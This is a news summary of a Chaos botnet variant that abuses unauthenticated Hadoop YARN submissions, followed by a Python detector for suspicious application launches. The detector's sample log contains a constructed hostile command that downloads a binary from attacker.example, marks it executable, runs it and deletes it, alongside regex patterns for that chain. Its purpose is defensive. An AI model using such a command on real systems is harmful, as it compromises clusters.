A new variant of the Chaos malware has been identified that targets misconfigured cloud deployments. This marks a significant expansion of the botnet's targeting, moving beyond its traditional focus on routers and edge devices, with further coverage provided by The Hacker News.

First documented in September 2022, Chaos is a cross-platform malware that can run remote shell commands, deploy additional modules, propagate by brute-forcing SSH, mine cryptocurrency, and launch DDoS attacks. Researchers believe it is an evolution of the Kaiji malware, which targeted misconfigured Docker instances.

The latest variant, identified by Darktrace, exploits misconfigured Hadoop instances through an HTTP request that creates a new application on the cluster; where application submission is reachable without authentication, that single request is enough to run an arbitrary command on a cluster node. The submitted application's launch command retrieves a Chaos agent binary from an attacker-controlled server, sets execute permissions on it, runs it, and then deletes the file to remove traces. The domain used in a recent attack was previously linked to a phishing campaign run by a Chinese cybercrime group. The new 64-bit ELF binary drops the SSH propagation and router-exploit functions and replaces them with a SOCKS proxy that relays traffic through the infected host, concealing the origin of other malicious activity.

The evolution of Chaos, including the addition of proxy services, indicates a shift in cybercriminal monetization strategies beyond cryptocurrency mining and DDoS-for-hire. The same trend, also seen in botnets such as AISURU, suggests that organizations face a broader range of threats from these evolving botnets.

Source: The Hacker News
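The download, chmod, execute, delete sequence described above is something a defender can hunt for in ResourceManager request logs. The following is an added example written for this page, not code from Darktrace, The Hacker News, or the Chaos authors. It assumes the "HTTP request to create a new application" refers to the Hadoop YARN ResourceManager REST API (a POST to /ws/v1/cluster/apps/new-application to obtain an application ID, then a POST to /ws/v1/cluster/apps whose am-container-spec carries the launch command); the page itself does not name the API. The log line format, every sample line, the IP addresses and the host attacker.example are all constructed for the example.

```python
"""Flag Hadoop YARN application submissions whose launch command follows the
download -> chmod -> execute -> delete chain.

Added example, not code from Darktrace or The Hacker News. Assumes the YARN
ResourceManager REST API is the "create a new application" request; the log
format and all log lines below are constructed.
"""
import json
import re
from datetime import datetime

NEW_APP_PATH = "/ws/v1/cluster/apps/new-application"
SUBMIT_PATH = "/ws/v1/cluster/apps"

# One regex per stage of the chain. Any single stage also appears in
# legitimate jobs, so analyze() only fires on a combination of them.
INDICATORS = {
    "download": re.compile(r"\b(curl|wget)\b"),
    "chmod_exec": re.compile(r"\bchmod\s+(\+x|u\+x|a\+x|[0-7]*[1357][0-7]{2}\b)"),
    "exec_from_tmp": re.compile(r"(^|[;&|]\s*)(/tmp/|/dev/shm/|/var/tmp/)\S+"),
    "cleanup": re.compile(r"\brm\s+(-\w+\s+)*(/tmp/|/dev/shm/|/var/tmp/)"),
}

# Constructed log lines: "<timestamp> <src_ip> <method> <path> <body>".
# Line 2 mimics the behaviour described in the article; line 4 is a benign job.
SAMPLE_LOG = """\
2024-06-01T10:00:01Z 203.0.113.7 POST /ws/v1/cluster/apps/new-application -
2024-06-01T10:00:02Z 203.0.113.7 POST /ws/v1/cluster/apps {"application-id":"application_1717233600000_0001","application-name":"x","am-container-spec":{"commands":{"command":"curl -o /tmp/x http://attacker.example/chaos; chmod +x /tmp/x; /tmp/x; rm -f /tmp/x"}},"application-type":"YARN"}
2024-06-01T10:05:00Z 10.0.0.5 POST /ws/v1/cluster/apps/new-application -
2024-06-01T10:05:03Z 10.0.0.5 POST /ws/v1/cluster/apps {"application-id":"application_1717233600000_0002","application-name":"nightly-etl","am-container-spec":{"commands":{"command":"/opt/spark/bin/spark-submit --class etl.Main /opt/jobs/etl.jar"}},"application-type":"SPARK"}
"""


def parse_line(line):
    """Split one constructed log line into fields; the body keeps its spaces."""
    ts, src_ip, method, path, body = line.split(" ", 4)
    return {
        "ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
        "src_ip": src_ip,
        "method": method,
        "path": path,
        "body": body,
    }


def launch_command(body):
    """Return (application-id, AM container command) from a submission body."""
    try:
        payload = json.loads(body)
    except json.JSONDecodeError:
        return None, ""
    spec = payload.get("am-container-spec", {}).get("commands", {})
    return payload.get("application-id"), spec.get("command", "")


def classify_command(command):
    """Names of the chain stages present in a launch command, in INDICATORS order."""
    return [name for name, rx in INDICATORS.items() if rx.search(command)]


def analyze(log_text, max_gap_seconds=60):
    """Return one finding per suspicious submission.

    A submission is suspicious when its command fetches something from the
    network and either marks a file executable or runs something from a
    scratch directory. The finding also records whether the same client asked
    for a new application ID shortly before, the two-step shape of the abuse.
    """
    last_new_app = {}  # src_ip -> timestamp of its latest new-application call
    findings = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        entry = parse_line(raw)
        if entry["method"] != "POST":
            continue
        if entry["path"] == NEW_APP_PATH:
            last_new_app[entry["src_ip"]] = entry["ts"]
            continue
        if entry["path"] != SUBMIT_PATH:
            continue
        app_id, command = launch_command(entry["body"])
        hits = classify_command(command)
        if "download" not in hits or not ({"chmod_exec", "exec_from_tmp"} & set(hits)):
            continue
        prior = last_new_app.get(entry["src_ip"])
        staged = prior is not None and (entry["ts"] - prior).total_seconds() <= max_gap_seconds
        findings.append({
            "application_id": app_id,
            "src_ip": entry["src_ip"],
            "indicators": hits,
            "staged_via_new_application": staged,
            "command": command,
        })
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding["src_ip"], finding["application_id"], ",".join(finding["indicators"]))
```

The verdict deliberately requires a network fetch plus either a chmod or execution from a scratch directory, because a lone curl or a lone chmod is common in legitimate launch scripts; the cleanup stage and the new-application correlation are recorded as supporting context rather than required, since an attacker can drop either without changing the outcome. The real check that makes this detection unnecessary is not exposing application submission without authentication in the first place.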